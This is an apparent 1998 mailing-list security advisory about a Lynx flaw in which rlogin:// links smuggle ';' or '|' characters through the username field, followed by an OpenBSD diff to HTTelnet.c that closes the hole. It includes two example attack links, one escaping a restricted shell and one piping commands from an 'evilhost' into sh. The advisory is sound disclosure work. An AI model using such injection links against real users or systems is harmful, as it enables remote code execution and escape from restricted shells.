Lynx

[art () STACKEN KTH SE (Artur Grabowski)]

Lynx has a feature that allows trojans.

For users on systems where lynx is the login shell or somehow the only
program allowed to run, the user can obtain a shell by simply "clicking"
a link that looks like this: <a href="rlogin://foo;sh@foo">foo</a>.

Running hostile code is also easy with this feature:
<a href="rlogin://eviluser|sh () evilhost foo">foo</a>. The login shell
(or something similiar) for eviluser () evilhost foo prints out a few commands
to run on the victim.

The problem is in WWW/Library/Implementation/HTTelnet.c in the function
remote_session. It strips off "bad" characters ('|', ';') from everything
except the username:
        /*
         *      Modified to allow for odd chars in a username only if exists.
         *      05-28-94 Lynx 2-3-1 Garrett Arch Blythe
         */
That was a bad decision.

The obvious fix is to be more paranoid than "user friendly".

//art

(diff made to the OpenBSD cvs repository, so the line numbers can be wrong)

Index: HTTelnet.c
===================================================================
RCS file: /cvs/src/gnu/usr.bin/lynx/WWW/Library/Implementation/HTTelnet.c,v
retrieving revision 1.1.1.1
diff -u -w -u -r1.1.1.1 HTTelnet.c
--- HTTelnet.c  1998/03/11 17:47:47     1.1.1.1
+++ HTTelnet.c  1998/11/16 17:01:35
@@ -73,8 +73,7 @@
         *  *cp=0;  / * terminate at any ;,<,>,`,|,",' or space or return
         *  or tab to prevent security whole
         */
-       for(cp = (strchr(host, '@') ? strchr(host, '@') : host); *cp != '\0';
-               cp++)   {
+       for(cp = host; *cp != '\0'; cp++) {
            if(!isalnum(*cp) && *cp != '_' && *cp != '-' &&
                                *cp != ':' && *cp != '.' && *cp != '@') {
                *cp = '\0';